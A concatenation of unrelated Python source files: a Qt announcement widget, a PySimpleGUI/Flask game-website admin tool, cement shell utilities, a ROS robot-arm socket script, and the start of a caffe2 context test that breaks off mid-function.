self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, i: int):
self.valueChanged.emit(self.combobox.itemText(i))
self.combobox.lineEdit().setFont(QFont(self.combobox.itemText(i)))
def stateChangedEvent(self, v: bool):
self.combobox.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.combobox.setEnabled(False)
self.combobox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.combobox.setEnabled(True)
self.combobox.setToolTip("")
self.valueChanged.emit(self.combobox.currentText())
self.combobox.lineEdit().setFont(QFont(self.combobox.currentText()))
self.stateChanged.emit(v)
def setItems(self, items: list):
self.combobox.clear()
self.combobox.addItems(items)
class QAnnouncements(QLabel):
callInMain = Signal(object)
def __init__(self):
super().__init__()
self.area = QScrollArea()
self.setMaximumWidth(self.getPx(1000))
self.callInMain.connect(lambda f: f())
#self.setObjectName("subtitleLabel")
self.setFixedHeight(self.getPx(110))
self.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.setStyleSheet(f"#subtitleLabel{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;font-size: 12pt;}}*{{padding: 3px;}}")
self.setTtext(_("Fetching latest announcement, please wait..."))
layout = QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
self.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(0)
self.pictureLabel = QLabel()
self.pictureLabel.setContentsMargins(0, 0, 0, 0)
self.pictureLabel.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.textLabel = QLabel()
self.textLabel.setOpenExternalLinks(True)
self.textLabel.setContentsMargins(self.getPx(10), 0, self.getPx(10), 0)
self.textLabel.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)
layout.addStretch()
layout.addWidget(self.textLabel, stretch=0)
layout.addWidget(self.pictureLabel, stretch=0)
layout.addStretch()
self.w = QWidget()
self.w.setObjectName("backgroundWindow")
self.w.setLayout(layout)
self.w.setContentsMargins(0, 0, 0, 0)
self.area.setWidget(self.w)
l = QVBoxLayout()
l.setSpacing(0)
l.setContentsMargins(0, self.getPx(5), 0, self.getPx(5))
l.addWidget(self.area, stretch=1)
self.area.setWidgetResizable(True)
self.area.setContentsMargins(0, 0, 0, 0)
self.area.setObjectName("backgroundWindow")
self.area.setStyleSheet("border: 0px solid black; padding: 0px; margin: 0px;")
self.area.setFrameShape(QFrame.NoFrame)
self.area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.area.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.pictureLabel.setFixedHeight(self.area.height())
self.textLabel.setFixedHeight(self.area.height())
self.setLayout(l)
def loadAnnouncements(self):
try:
response = urlopen("http://www.somepythonthings.tk/resources/elevenclock.announcement")
print("🔵 Announcement URL:", response.url)
response = response.read().decode("utf8")
self.callInMain.emit(lambda: self.setTtext(""))
announcement_body = response.split("////")[0].strip().replace("http://", "ignore:").replace("https://", "ignoreSecure:").replace("linkId", "http://somepythonthings.tk/redirect/").replace("linkColor", f"rgb({getColors()[2 if isWindowDark() else 4]})")
self.callInMain.emit(lambda: self.textLabel.setText(announcement_body))
self.callInMain.emit(lambda: self.pictureLabel.setText("Loading media..."))
announcement_image_url = response.split("////")[1].strip()
try:
response = urlopen(announcement_image_url)
print("🔵 Image URL:", response.url)
response = response.read()
self.file = open(os.path.join(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock")), "announcement.png"), "wb")
self.file.write(response)
self.callInMain.emit(lambda: self.pictureLabel.setText(""))
self.file.close()
h = self.area.height()
self.callInMain.emit(lambda: self.pictureLabel.setFixedHeight(h))
self.callInMain.emit(lambda: self.textLabel.setFixedHeight(h))
self.callInMain.emit(lambda: self.pictureLabel.setPixmap(QPixmap(self.file.name).scaledToHeight(h-self.getPx(6), Qt.SmoothTransformation)))
except Exception as ex:
s = _("Couldn't load the announcement image")+"\n\n"+str(ex)
self.callInMain.emit(lambda: self.pictureLabel.setText(s))
print("🟠 Unable to retrieve announcement image")
report(ex)
except Exception as e:
s = _("Couldn't load the announcements. Please try again later")+"\n\n"+str(e)
self.callInMain.emit(lambda: self.setTtext(s))
print("🟠 Unable to retrieve latest announcement")
report(e)
def showEvent(self, a0: QShowEvent) -> None:
return super().showEvent(a0)
def getPx(self, i: int) -> int:
return round(i*(self.screen().logicalDotsPerInch()/96))
def setTtext(self, a0: str) -> None:
return super().setText(a0)
def setText(self, a: str) -> None:
raise Exception("This member should not be used under any circumstances")
if __name__ == "__main__":
import __init__
|
DTpyWeb.py
|
import PySimpleGUI as sg
import os, re, subprocess
from flask import Flask, render_template, flash, redirect, url_for, request, session
from classes.forms import RegistrationForm
from classes.functions import Main
import datetime, textwrap
from configparser import ConfigParser
from multiprocessing import Process
import webbrowser
import threading
configPath = "config.ini"
config = ConfigParser()
config.read(configPath)
def validipv4(ip):
pattern = re.compile(r"""
^
(?:
# Dotted variants:
(?:
# Decimal 1-255 (no leading 0's)
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's)
|
0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)
)
(?: # Repeat 0-3 times, separated by a dot
\.
(?:
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2}
|
0+[1-3]?[0-7]{0,2}
)
){0,3}
|
0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff
|
0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777
|
# Decimal notation, 1-4294967295:
429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}|
42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}|
4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8}
)
$
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(ip) is not None
sqlRefference = "Windows Drivers Reference\n" \
"{SQL Server} - released with SQL Server 2000\n" \
"{SQL Native Client} - released with SQL Server 2005 (also known as version 9.0)\n" \
"{SQL Server Native Client 10.0} - released with SQL Server 2008\n" \
"{SQL Server Native Client 11.0} - released with SQL Server 2012\n" \
"{ODBC Driver 11 for SQL Server} - supports SQL Server 2005 through 2014\n" \
"{ODBC Driver 13 for SQL Server} - supports SQL Server 2005 through 2016\n" \
"{ODBC Driver 13.1 for SQL Server} - supports SQL Server 2008 through 2016\n" \
"{ODBC Driver 17 for SQL Server} - supports SQL Server 2008 through 2017"
sqlConnect = [
[sg.Text("SQL Driver", size=(10,1)), sg.DropDown(
enable_events=True,
readonly=True,
font=10,
default_value=config.get("sqlConfig", "sql_driver"),
size=(24,1),
tooltip=sqlRefference, pad=(0,5),
values=["{SQL Server}",
"{SQL Native Client}",
"{SQL Server Native Client 10.0}",
"{SQL Server Native Client 11.0}",
"{ODBC Driver 11 for SQL Server}",
"{ODBC Driver 13 for SQL Server}",
"{ODBC Driver 13.1 for SQL Server}",
"{ODBC Driver 17 for SQL Server}"])],
[sg.Text("Instance",size=(10,1),pad=(0,5) ), sg.InputText(default_text=(config.get("sqlConfig", "SQL_SERVER"))), ],
[sg.Text("Port", size=(10,1) ,pad=(0,5) ),sg.InputText(default_text=(config.get("sqlConfig", "SQL_PORT")))],
[sg.Text("Username", size=(10,1),pad=(0,5)),sg.InputText( default_text=(config.get("sqlConfig", "SQL_USER")))],
[sg.Text("Password", size=(10,1),pad=(0,5)), sg.InputText(password_char="*",default_text=(config.get("sqlConfig", "SQL_PASS")))],
[sg.Text("Database", size=(10,1),pad=(0,5)), sg.InputText(default_text=(config.get("sqlConfig", "SQL_DBASE")))]]
def isPortFree(host,port):
import socket, errno
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((host, port))
except socket.error as e:
return False
finally:
return True
s.close()
def ExecuteCommandSubprocess(command, wait=False, quiet=True, *args):
try:
sp = subprocess.Popen([command,*args], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if wait:
out, err = sp.communicate()
if not quiet:
if out:
print(out.decode("utf-8"))
if err:
print(err.decode("utf-8"))
except Exception as e:
print('Exception encountered running command ', e)
return ''
return (out.decode('utf-8'))
def listThemes():
themes_list = []
for themes in os.listdir('templates/themes/'):
themes_list.append(themes)
return themes_list
def seasons(vars):
if vars == "Season 0-1":
return 20
elif vars == "Season 2-8":
return 32
elif vars == "Season 9-13":
return 64
else:
return 20
def season_reverse(value):
if value == 20:
return "Season 0-1"
elif value == 32:
return "Season 2-8"
elif value == 64:
return "Season 9-13"
else:
return "Season 0-1"
webSettings = [
[sg.Text("Server Name", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get("webConfig", "server_name"))), ],
[sg.Text("Secret Key", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get("webConfig", "secret_key")))],
[sg.Text("Season", size=(10, 1), pad=(0, 5)), sg.DropDown(default_value=season_reverse(config.getint("webConfig", "item_hex_len")),
values=["Season 0-1", "Season 2-8", "Season 9-13"], readonly=True)],
[sg.Text("Web Debug", size=(10, 1), pad=(0, 5)), sg.Checkbox(text="", default=config.getboolean("webConfig", "web_debug"))],
[sg.Text("Web IP", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get("webConfig", "web_ip")))],
[sg.Text("Web PORT", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.getint("webConfig", "web_port")))],
[sg.Text("Web Theme", size=(10, 1), pad=(0, 5)), sg.DropDown(default_value=config.get("webConfig", "web_theme"),values=listThemes(), readonly=True)],
[sg.Text("Theme Switcher", size=(10, 1), pad=(0, 5)), sg.Checkbox(text="", default=config.getboolean("webConfig", "theme_switcher"))]
]
layout = [[sg.TabGroup([[sg.Tab('SQL Settings', sqlConnect), sg.Tab('WEB Settings', webSettings)]])],
[sg.Button('Start Server', disabled=False,auto_size_button=False),
sg.Button('Stop Server', disabled=True, auto_size_button=False)]
]
window = sg.Window('DTpyWeb GUI v2', icon="static/default-images/favicon.ico",
auto_size_text=False,
default_element_size=(30, 1),
return_keyboard_events=True,
use_default_focus=False,
text_justification="left"
).Layout(layout).Finalize()
def runWeb():
configPath = "config.ini"
config = ConfigParser()
config.read(configPath)
main = Main()
app = Flask(__name__)
app.config['SECRET_KEY'] = config.get("webConfig", "secret_key")
@app.context_processor
def _processor():
return dict(
date_now=datetime.datetime.now().strftime("%d.m.%Y %H:%M:%S"),
author="© 2020 r00tme - DTpyWeb. All rights reserved.",
theme=main.themes_check()[0],
theme_switch_form = main.themes_check()[1],
theme_switch_active = config.getboolean("webConfig", "theme_switcher"),
top10=main.rankings(" TOP 10 "),
header="header.html",
server=config.get("webConfig", "server_name"),
)
@app.route('/userinfo', methods=['GET'])
@app.route('/userinfo<path:path>', methods=['GET', 'POST'])
def users_info(path):
main.theme_switcher()
if main.user_exist(path[1:], False):
item_image = []
item_info = []
for i in range(0, 12):
user_items = textwrap.wrap(main.return_items(path[1:]), config.getint("webConfig", "item_hex_len"))[i]
if main.item_info(user_items):
item_image.append(main.item_info(user_items)[1])
item_info.append(main.item_info(user_items)[0])
else:
item_image.append("")
item_info.append("")
return render_template("modules/userinfo.html", title="Character Information Page",
item_info=item_info, item_image=item_image, character=path[1:])
else:
flash(r'This user does not exist', 'error')
return redirect(url_for('home'))
@app.route('/', methods=['GET', 'POST'])
@app.route('/home', methods=['GET', 'POST'])
def home():
# TODO news System
# * This route will be removed after the news system is completed
main.login()
main.theme_switcher()
stripin = main.themes_check()[0].split('/')
return render_template("%s/%s/home.html" % (stripin[0], stripin[1]), title="News")
@app.route('/download', methods=['GET', 'POST'])
@app.route('/about', methods=['GET', 'POST'])
@app.route('/rules', methods=['GET', 'POST'])
@app.route('/rankings', methods=['GET', 'POST'])
def main_pages():
main.login()
main.theme_switcher()
var = config.get("dl_links", "dl_links")
cors = str(var).split("\n")
return render_template("modules/" + request.path + ".html", title=u"%s" % request.path[1:].capitalize(),
download_links=cors)
@app.route('/buy-credits', methods=['GET', 'POST'])
@app.route('/my-auction', methods=['GET', 'POST'])
@app.route('/buy-credits', methods=['GET', 'POST'])
@app.route('/my-account', methods=['GET', 'POST'])
@app.route('/my-characters', methods=['GET', 'POST'])
@app.route('/vip-modules', methods=['GET', 'POST'])
@app.route('/my-market', methods=['GET', 'POST'])
def user_pages():
main.theme_switcher()
if 'username' not in session:
flash(r'You do not have an access to this page', 'error')
return redirect(url_for('home'))
else:
return render_template("modules/user/" + request.path + ".html",
title=u"%s %s Page" % (request.path.split("-")[0][1:].title(),
request.path.split("-")[1].title()))
@app.route('/logout')
def logout():
session.pop('username', None)
flash('You were logged out', 'info')
return redirect('/home')
@app.route('/register', methods=['GET', 'POST'])
def register():
main.theme_switcher()
form = RegistrationForm()
if form.validate_on_submit():
main.register(
form.username.data,
form.password.data,
form.email.data,
form.question.data,
form.answer.data)
return render_template("modules/register.html", title="Register", form=form)
@app.errorhandler(404)
def page_not_found(e):
return render_template("modules/404.html", title="Page does not exist"), 404
from flask import request
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
@app.route('/shutdown', methods=['POST'])
def shutdown():
shutdown_server()
return 'Server shutting down...'
app.run(debug=False, host=config.get("webConfig", "web_ip"),
port=config.getint("webConfig", "web_port"))
def thegui():
while True:
event, values = window.Read(timeout=0)
if event is None or event == "Exit": # always, always give a way out!
break
if event is not sg.TIMEOUT_KEY:
config.set("sqlConfig", str("sql_driver"), str(values[0]))
config.set("sqlConfig", str("sql_server"), str(values[1]))
if values[2].isdigit():
config.set("sqlConfig", "sql_port", values[2])
else:
sg.Popup("Type a valid and not in use port number")
window.FindElement(values[2]).Update(values[2][:-1])
config.set("sqlConfig", str("sql_user"), str(values[3]))
config.set("sqlConfig", str("sql_pass"), str(values[4]))
config.set("sqlConfig", str("sql_dbase"), str(values[5]))
config.set("webConfig", str("server_name"), str(values[6]))
config.set("webConfig", str("secret_key"), str(values[7]))
config.set("webConfig", str("item_hex_len"), str(seasons(values[8])))
config.set("webConfig", str("web_debug"), str(values[9]))
if validipv4(values[10]):
config.set("webConfig", str("web_ip"), str(values[10]))
else:
sg.Popup("Type a valid IP address")
window.FindElement(values[10]).Update(values[10][:-1])
if values[11].isdigit():
config.set("webConfig", "web_port", values[11])
else:
sg.Popup("Type a valid and not in use port number")
window.FindElement(values[11]).Update(values[11][:-1])
config.set("webConfig", str("web_theme"), str(values[12]))
config.set("webConfig", str("theme_switcher"), str(values[13]))
with open(configPath, "w+") as f:
config.write(f)
if event == "Start Server":
window.Element('Start Server').Update(disabled=True)
window.Element('Stop Server').Update(disabled=False)
if isPortFree(values[10], int(values[11])):
threading.Thread(target=runWeb).start()
os.startfile("http://" + config.get("webConfig","web_ip") + ":" + config.get("webConfig","web_port"))
else:
sg.Popup("Port %s is already in use, \nchange the port or close the program that use it" % values[10])
if event == "Stop Server":
os.system('taskkill /f /im DTpyWeb.exe')
os.system('taskkill /f /im python.exe')
os.system('start DTpyWeb.exe')
if __name__ == '__main__':
thegui()
|
shell.py
|
"""Common Shell Utilities."""
import os
import sys
from subprocess import Popen, PIPE
from multiprocessing import Process
from threading import Thread
from ..core.meta import MetaMixin
from ..core.exc import FrameworkError
def exec_cmd(cmd_args, *args, **kw):
"""
Execute a shell call using Subprocess. All additional `*args` and
`**kwargs` are passed directly to subprocess.Popen. See `Subprocess
<http://docs.python.org/library/subprocess.html>`_ for more information
on the features of `Popen()`.
:param cmd_args: List of command line arguments.
:type cmd_args: list.
:param args: Additional arguments are passed to Popen().
:param kwargs: Additional keyword arguments are passed to Popen().
:returns: The (stdout, stderror, return_code) of the command.
:rtype: tuple
Usage:
.. code-block:: python
from cement.utils import shell
stdout, stderr, exitcode = shell.exec_cmd(['echo', 'helloworld'])
"""
if 'stdout' not in kw.keys():
kw['stdout'] = PIPE
if 'stderr' not in kw.keys():
kw['stderr'] = PIPE
proc = Popen(cmd_args, *args, **kw)
(stdout, stderr) = proc.communicate()
proc.wait()
return (stdout, stderr, proc.returncode)
def exec_cmd2(cmd_args, *args, **kw):
"""
Similar to exec_cmd, however does not capture stdout, stderr (therefore
allowing it to print to console). All additional `*args` and
`**kwargs` are passed directly to subprocess.Popen. See `Subprocess
<http://docs.python.org/library/subprocess.html>`_ for more information
on the features of `Popen()`.
:param cmd_args: List of command line arguments.
:type cmd_args: list.
:param args: Additional arguments are passed to Popen().
:param kwargs: Additional keyword arguments are passed to Popen().
:returns: The integer return code of the command.
:rtype: int
Usage:
.. code-block:: python
from cement.utils import shell
exitcode = shell.exec_cmd2(['echo', 'helloworld'])
"""
proc = Popen(cmd_args, *args, **kw)
proc.wait()
return proc.returncode
def spawn_process(target, start=True, join=False, *args, **kwargs):
"""
A quick wrapper around multiprocessing.Process(). By default the start()
function will be called before the spawned process object is returned.
See `MultiProcessing
<https://docs.python.org/2/library/multiprocessing.html>`_ for more
information on the features of `Process()`.
:param target: The target function to execute in the sub-process.
:param start: Call start() on the process before returning the process
object.
:param join: Call join() on the process before returning the process
object. Only called if start=True.
:param args: Additional arguments are passed to Process().
:param kwargs: Additional keyword arguments are passed to Process().
:returns: The process object returned by Process().
Usage:
.. code-block:: python
from cement.utils import shell
def add(a, b):
print(a + b)
p = shell.spawn_process(add, args=(12, 27))
p.join()
"""
proc = Process(target=target, *args, **kwargs)
if start and not join:
proc.start()
elif start and join:
proc.start()
proc.join()
return proc
def spawn_thread(target, start=True, join=False, *args, **kwargs):
"""
A quick wrapper around threading.Thread(). By default the start()
function will be called before the spawned thread object is returned
See `Threading
<https://docs.python.org/2/library/threading.html>`_ for more
information on the features of `Thread()`.
:param target: The target function to execute in the thread.
:param start: Call start() on the thread before returning the thread
object.
:param join: Call join() on the thread before returning the thread
object. Only called if start=True.
:param args: Additional arguments are passed to Thread().
:param kwargs: Additional keyword arguments are passed to Thread().
:returns: The thread object returned by Thread().
Usage:
.. code-block:: python
from cement.utils import shell
def add(a, b):
print(a + b)
t = shell.spawn_thread(add, args=(12, 27))
t.join()
"""
thr = Thread(target=target, *args, **kwargs)
if start and not join:
thr.start()
elif start and join:
thr.start()
thr.join()
return thr
class Prompt(MetaMixin):
"""
A wrapper around `raw_input` or `input` (py3) whose purpose is to limit
the redundent tasks of gather usr input. Can be used in several ways
depending on the use case (simple input, options, and numbered
selection).
:param text: The text displayed at the input prompt.
Usage:
Simple prompt to halt operations and wait for user to hit enter:
.. code-block:: python
p = shell.Prompt("Press Enter To Continue", default='ENTER')
.. code-block:: text
$ python myapp.py
Press Enter To Continue
$
Provide a numbered list for longer selections:
.. code-block:: python
p = Prompt("Where do you live?",
options=[
'San Antonio, TX',
'Austin, TX',
'Dallas, TX',
'Houston, TX',
],
numbered = True,
)
.. code-block:: text
Where do you live?
1: San Antonio, TX
2: Austin, TX
3: Dallas, TX
4: Houston, TX
Enter the number for your selection:
Create a more complex prompt, and process the input from the user:
.. code-block:: python
class MyPrompt(Prompt):
class Meta:
text = "Do you agree to the terms?"
options = ['Yes', 'no', 'maybe-so']
options_separator = '|'
default = 'no'
clear = True
max_attempts = 99
def process_input(self):
if self.input.lower() == 'yes':
# do something crazy
pass
else:
# don't do anything... maybe exit?
print("User doesn't agree! I'm outa here")
sys.exit(1)
MyPrompt()
.. code-block:: text
$ python myapp.py
[TERMINAL CLEAR]
Do you agree to the terms? [Yes|no|maybe-so] no
User doesn't agree! I'm outa here
$ echo $?
$ 1
"""
class Meta:
"""
Optional meta-data (can also be passed as keyword arguments to the
parent class).
"""
# The text that is displayed to prompt the user
text = "Tell me someting interesting:"
#: A default value to use if the user doesn't provide any input
default = None
#: Options to provide to the user. If set, the input must match one
#: of the items in the options selection.
options = None
#: Separator to use within the option selection (non-numbered)
options_separator = ','
#: Display options in a numbered list, where the user can enter a
#: number. Useful for long selections.
numbered = False
#: The text to display along with the numbered selection for user
#: input.
selection_text = "Enter the number for your selection:"
#: Whether or not to automatically prompt() the user once the class
#: is instantiated.
auto = True
#: Whether to treat user input as case insensitive (only used to
#: compare user input with available options).
case_insensitive = True
#: Whether or not to clear the terminal when prompting the user.
clear = False
#: Command to issue when clearing the terminal.
clear_command = 'clear'
#: Max attempts to get proper input from the user before giving up.
max_attempts = 10
#: Raise an exception when max_attempts is hit? If not, Prompt
#: passes the input through as `None`.
max_attempts_exception = True
def __init__(self, text=None, *args, **kw):
if text is not None:
kw['text'] = text
super(Prompt, self).__init__(*args, **kw)
self.input = None
if self._meta.auto:
self.prompt()
def _prompt(self):
if self._meta.clear:
os.system(self._meta.clear_command)
text = ""
if self._meta.options is not None:
if self._meta.numbered is True:
text = text + self._meta.text + "\n\n"
count = 1
for option in self._meta.options:
text = text + "%s: %s\n" % (count, option)
count += 1
text = text + "\n"
text = text + self._meta.selection_text
else:
sep = self._meta.options_separator
text = "%s [%s]" % (self._meta.text,
sep.join(self._meta.options))
else:
text = self._meta.text
if sys.version_info[0] < 3: # pragma: nocover
self.input = raw_input("%s " % text) # pragma: nocover
else: # pragma: nocover
self.input = input("%s " % text) # pragma: nocover
if self.input == '' and self._meta.default is not None:
self.input = self._meta.default
elif self.input == '':
self.input = None
def prompt(self):
"""
Prompt the user, and store their input as `self.input`.
"""
attempt = 0
while self.input is None:
if attempt >= int(self._meta.max_attempts):
if self._meta.max_attempts_exception is True:
raise FrameworkError("Maximum attempts exceeded getting "
"valid user input")
else:
return self.input
attempt += 1
self._prompt()
if self.input is None:
continue
elif self._meta.options is not None:
if self._meta.numbered:
try:
self.input = self._meta.options[int(self.input) - 1]
except (IndexError, ValueError) as e:
self.input = None
continue
else:
if self._meta.case_insensitive is True:
lower_options = [x.lower()
for x in self._meta.options]
if not self.input.lower() in lower_options:
self.input = None
continue
else:
if self.input not in self._meta.options:
self.input = None
continue
self.process_input()
return self.input
def process_input(self):
"""
Does not do anything. Is intended to be used in a sub-class to handle
user input after it is prompted.
"""
pass
|
RobotArm5_socket_ros_20190521164009.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import RobotArm5_socket_TCPcmd as TCP
import RobotArm5_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' #設定傳輸資料初始直
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.0.1', 8080))#iclab 5
s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : '))
#start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
socket_cmd.action= 5
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
###test 0403
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Hiwin test 20190521
# feedback = 0
# socket_client_arm_state(feedback)
#Hiwin test 20190521
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
context_test.py
|
from caffe2.python import context, test_util
from threading import Thread
class MyContext(context.Managed):
pass
class DefaultMyContext(context.DefaultManaged):
pass
class ChildMyContext(MyContext):
pass
class TestContext(test_util.TestCase):
def use_my_context(self):
try:
for _ in range(100):
with MyContext() as a:
for _ in range(100):
self.assertTrue(MyContext.current() == a)
except Exception as e:
self._exceptions.append(e)
def testMultiThreaded(self):
threads = []
self._exceptions = []
for _ in range(8):
thread = Thread(target=self.use_my_context)
thread.start()
threads.append(thread)
for t in threads:
t.join()
for e in self._exceptions:
raise e
@MyContext()
def testDecorator(self):
self.assertIsNotNone(MyContext.current())
def testNonDefaultCurrent(self):
with self.assertRaises(AssertionError):
MyContext.current()
ctx = MyContext()
self.assertEqual(MyContext.current(value=ctx), ctx)
self.assertIsNone(MyContext.current(required=False))
def testDefaultCurrent(self):
self.assertIsInstance(DefaultMyContext.current(), DefaultMyContext)
def testNestedContexts(self):
with MyContext() as ctx1:
with DefaultMyContext() as ctx2:
self.assertEqual(DefaultMyContext.current(), ctx2)
self.assertEqual(MyContext.current(), ctx1)
def testChildClasses(self):
with ChildMyContext() as ctx:
